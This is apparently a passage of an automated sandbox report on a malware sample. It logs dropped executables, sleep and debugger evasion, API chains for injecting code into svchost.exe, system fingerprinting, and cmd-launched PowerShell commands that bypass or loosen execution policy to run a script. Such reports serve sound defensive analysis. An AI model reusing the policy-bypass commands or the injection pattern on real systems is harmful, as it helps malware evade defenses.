    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 440Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8765Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 840Jump to behavior
    Source: C:\Users\user\Desktop\6f0slJzOrF.exeDropped PE file which has not been started: C:\Users\Public\Bilite\winrar-x64-700scp.exeJump to dropped file
    Source: C:\Users\Public\Bilite\Axialis\Update.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\backup.dllJump to dropped file
    Source: C:\Users\Public\Bilite\Axialis\Update.exeAPI coverage: 7.2 %
    Source: C:\Users\Public\Bilite\Axialis\Update.exe TID: 7524Thread sleep time: -73000s >= -30000sJump to behavior
    Source: C:\Users\Public\Bilite\Axialis\Update.exe TID: 7520Thread sleep time: -63000s >= -30000sJump to behavior
    Source: C:\Users\Public\Bilite\Axialis\Update.exe TID: 8028Thread sleep time: -30000s >= -30000sJump to behavior
    Source: C:\Users\Public\Bilite\Axialis\Update.exe TID: 5804Thread sleep count: 340 > 30Jump to behavior
    Source: C:\Users\Public\Bilite\Axialis\Update.exe TID: 2832Thread sleep count: 5763 > 30Jump to behavior
    Source: C:\Users\Public\Bilite\Axialis\Update.exe TID: 2832Thread sleep time: -57630s >= -30000sJump to behavior
    Source: C:\Windows\SysWOW64\timeout.exe TID: 8132Thread sleep count: 255 > 30Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2056Thread sleep count: 4294 > 30Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7300Thread sleep time: -922337203685477s >= -30000sJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5468Thread sleep count: 440 > 30Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4416Thread sleep time: -922337203685477s >= -30000sJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5332Thread sleep count: 8765 > 30Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7296Thread sleep time: -922337203685477s >= -30000sJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7204Thread sleep count: 840 > 30Jump to behavior
    Source: C:\Windows\SysWOW64\timeout.exe TID: 7576Thread sleep count: 265 > 30
    Source: C:\Windows\SysWOW64\timeout.exe TID: 7716Thread sleep count: 269 > 30
    Source: C:\Windows\SysWOW64\timeout.exe TID: 5368Thread sleep count: 149 > 30
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Users\Public\Bilite\Axialis\Update.exeLast function: Thread delayed
    Source: C:\Users\Public\Bilite\Axialis\Update.exeLast function: Thread delayed
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Windows\SysWOW64\timeout.exeLast function: Thread delayed
    Source: C:\Windows\SysWOW64\timeout.exeLast function: Thread delayed
    Source: C:\Users\Public\Bilite\Axialis\Update.exeThread sleep count: Count: 5763 delay: -10Jump to behavior
    Source: C:\Users\Public\Bilite\Axialis\Update.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
    Source: C:\Users\user\Desktop\6f0slJzOrF.exeCode function: 0_2_0040301A GetFileAttributesW,SetLastError,FindFirstFileW,FindClose,CompareFileTime,0_2_0040301A
    Source: C:\Users\user\Desktop\6f0slJzOrF.exeCode function: 0_2_00402B79 FindFirstFileW,SetFileAttributesW,lstrcmpW,lstrcmpW,SetFileAttributesW,DeleteFileW,FindNextFileW,FindClose,SetFileAttributesW,RemoveDirectoryW,??3@YAXPAX@Z,??3@YAXPAX@Z,0_2_00402B79
    Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_6C32813B FindFirstFileExW,3_2_6C32813B
    Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_6C3281EC FindFirstFileExW,RevokeDragDrop,FindNextFileW,FindClose,FindClose,3_2_6C3281EC
    Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_6C2116B5 __EH_prolog3_GS,GetFullPathNameW,PathIsUNCW,GetVolumeInformationW,CharUpperW,FindFirstFileW,FindClose,3_2_6C2116B5
    Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_043280F0 wsprintfW,GetLogicalDriveStringsW,lstrcmpiW,lstrcmpiW,QueryDosDeviceW,lstrlenW,__wcsnicmp,lstrcpyW,lstrcpyW,lstrcatW,3_2_043280F0
    Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_04325430 _memset,_memset,_memset,gethostname,gethostbyname,inet_ntoa,_strcat_s,_strcat_s,inet_ntoa,_strcat_s,_strcat_s,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,GetLastInputInfo,GetTickCount,wsprintfW,wsprintfW,MultiByteToWideChar,MultiByteToWideChar,GetSystemInfo,wsprintfW,GetForegroundWindow,GetWindowTextW,lstrlenW,lstrlenW,GetModuleHandleW,GetProcAddress,GetNativeSystemInfo,GetSystemInfo,wsprintfW,GetCurrentProcessId,OpenProcess,K32GetProcessImageFileNameW,CloseHandle,GetTickCount,__time64,__localtime64,wsprintfW,GetLocaleInfoW,GetSystemDirectoryW,GetCurrentHwProfileW,3_2_04325430
    Source: C:\Users\Public\Bilite\Axialis\Update.exeThread delayed: delay time: 73000Jump to behavior
    Source: C:\Users\Public\Bilite\Axialis\Update.exeThread delayed: delay time: 30000Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: powershell.exe, 00000012.00000002.2595617657.00000000043C6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapter
    Source: powershell.exe, 00000012.00000002.2595617657.00000000043C6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapter
    Source: powershell.exe, 00000012.00000002.2595617657.00000000043C6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapter
    Source: Update.exe, 00000003.00000002.3549168443.00000000014FC000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000003.00000003.2902927331.00000000014FB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
    Source: C:\Users\Public\Bilite\Axialis\Update.exeAPI call chain: ExitProcess graph end nodegraph_3-130451
    Source: C:\Users\Public\Bilite\Axialis\Update.exeProcess information queried: ProcessInformationJump to behavior
    Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_002215D0 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_002215D0
    Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_6C1CA257 OutputDebugStringA,GetLastError,3_2_6C1CA257
    Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_0433054D VirtualProtect ?,-00000001,00000104,?3_2_0433054D
    Source: C:\Users\user\Desktop\6f0slJzOrF.exeCode function: 0_2_00406D5D LoadLibraryA,GetProcAddress,GetModuleHandleW,GetWindow,GetWindow,LoadIconW,GetWindow,0_2_00406D5D
    Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_03280AE4 mov eax, dword ptr fs:[00000030h]3_2_03280AE4
    Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_041A00CD mov eax, dword ptr fs:[00000030h]3_2_041A00CD
    Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_04326790 wsprintfW,GetTokenInformation,GetLastError,GetProcessHeap,HeapAlloc,GetTokenInformation,LookupAccountSidW,GetLastError,GetProcessHeap,HeapFree,3_2_04326790
    Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: Debug
    Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: Debug
    Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: Debug
    Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_00221A8F SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_00221A8F
    Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_00221764 SetUnhandledExceptionFilter,3_2_00221764
    Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_002215D0 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_002215D0
    Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_0432DF10 Sleep,CloseHandle,GetLocalTime,wsprintfW,SetUnhandledExceptionFilter,CloseHandle,EnumWindows,EnumWindows,Sleep,EnumWindows,Sleep,CreateEventA,Sleep,RegOpenKeyExW,RegQueryValueExW,CloseHandle,Sleep,WaitForSingleObject,CloseHandle,Sleep,CloseHandle,WaitForSingleObject,CloseHandle,Sleep,CloseHandle,3_2_0432DF10
    Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_04331F67 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_04331F67
    Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_0432F00A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_0432F00A
    Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_6C31AEDD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_6C31AEDD
    Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_6C1E6AD6 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_6C1E6AD6
    Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_6C241B96 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_6C241B96
    Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_10008587 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_10008587
    Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_10006815 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_10006815
    Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_032867EC IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_032867EC

    HIPS / PFW / Operating System Protection Evasion

    barindex
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\updated.ps1
    Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_04327E50 _memset,_memset,_memset,GetSystemDirectoryA,GetFileAttributesA,CreateProcessA,VirtualAllocEx,WriteProcessMemory,GetThreadContext,SetThreadContext,ResumeThread,3_2_04327E50
    Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_043277E0 Sleep,OpenProcess,_memset,_memset,GetSystemDirectoryA,GetFileAttributesA,CreateProcessA,OpenProcess,_memset,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetCurrentProcess,GetProcessId,_memset,GetModuleFileNameA,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,CreateRemoteThread,Sleep,VirtualProtectEx,VirtualProtectEx,VirtualProtectEx,ResumeThread,3_2_043277E0
    Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: Sleep,OpenProcess,_memset,_memset,GetSystemDirectoryA,GetFileAttributesA,CreateProcessA,OpenProcess,_memset,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetCurrentProcess,GetProcessId,_memset,GetModuleFileNameA,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,CreateRemoteThread,Sleep,VirtualProtectEx,VirtualProtectEx,VirtualProtectEx,ResumeThread, Windows\SysWOW64\svchost.exe3_2_043277E0
    Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: Sleep,OpenProcess,_memset,_memset,GetSystemDirectoryA,GetFileAttributesA,CreateProcessA,OpenProcess,_memset,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetCurrentProcess,GetProcessId,_memset,GetModuleFileNameA,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,CreateRemoteThread,Sleep,VirtualProtectEx,VirtualProtectEx,VirtualProtectEx,ResumeThread, Windows\System32\svchost.exe3_2_043277E0
    Source: C:\Users\user\Desktop\6f0slJzOrF.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c start C:\Users\Public\Bilite\Axialis\Update.exeJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\Public\Bilite\Axialis\Update.exe C:\Users\Public\Bilite\Axialis\Update.exeJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "IMAGENAME eq Update.exe" Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "Update.exe" Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 30 /nobreakJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "IMAGENAME eq Update.exe" Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "Update.exe" Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 30 /nobreakJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "IMAGENAME eq Update.exe" Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "Update.exe" Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 30 /nobreakJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "IMAGENAME eq Update.exe" Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "Update.exe" Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 30 /nobreakJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser"Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\updated.ps1Jump to behavior
    Source: Update.exe, 00000003.00000003.3386596565.0000000005341000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000003.00000003.3221832615.0000000005341000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000003.00000003.2733520874.000000000531D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 0 minProgram Manager
    Source: Update.exe, 00000003.00000002.3551135076.0000000005341000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 0 minProgram ManagerG
    Source: C:\Users\user\Desktop\6f0slJzOrF.exeCode function: 0_2_0040D72E cpuid 0_2_0040D72E
    Source: C:\Users\user\Desktop\6f0slJzOrF.exeCode function: GetLastError,GetLastError,wsprintfW,GetEnvironmentVariableW,GetEnvironmentVariableW,GetLastError,??2@YAPAXI@Z,GetEnvironmentVariableW,GetLastError,lstrcmpiW,??3@YAXPAX@Z,??3@YAXPAX@Z,SetLastError,lstrlenA,??2@YAPAXI@Z,GetLocaleInfoW,_wtol,MultiByteToWideChar,0_2_00401F9D
    Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: _memset,_memset,_memset,gethostname,gethostbyname,inet_ntoa,_strcat_s,_strcat_s,inet_ntoa,_strcat_s,_strcat_s,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,GetLastInputInfo,GetTickCount,wsprintfW,wsprintfW,MultiByteToWideChar,MultiByteToWideChar,GetSystemInfo,wsprintfW,GetForegroundWindow,GetWindowTextW,lstrlenW,lstrlenW,GetModuleHandleW,GetProcAddress,GetNativeSystemInfo,GetSystemInfo,wsprintfW,GetCurrentProcessId,OpenProcess,K32GetProcessImageFileNameW,CloseHandle,GetTickCount,__time64,__localtime64,wsprintfW,GetLocaleInfoW,GetSystemDirectoryW,GetCurrentHwProfileW,3_2_04325430
    Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: EnumSystemLocalesW,3_2_6C324C0B
    Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: EnumSystemLocalesW,3_2_6C32EDC4
    Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: GetLocaleInfoW,3_2_6C32EE23
    Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: EnumSystemLocalesW,3_2_6C32EEF8
    Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: GetLocaleInfoW,3_2_6C32EF43
    Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,3_2_6C32EFEA
    Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,3_2_6C32E885
    Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: EnumSystemLocalesW,3_2_6C32EAD6
    Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,3_2_6C32EB71
    Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: GetLocaleInfoW,3_2_6C3245EC
    Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: GetModuleHandleW,GetProcAddress,EncodePointer,DecodePointer,GetLocaleInfoW,3_2_6C1EF4A1
    Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: GetLocaleInfoW,3_2_6C32F0F0
    Source: C:\Users\Public\Bilite\Axialis\Update.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
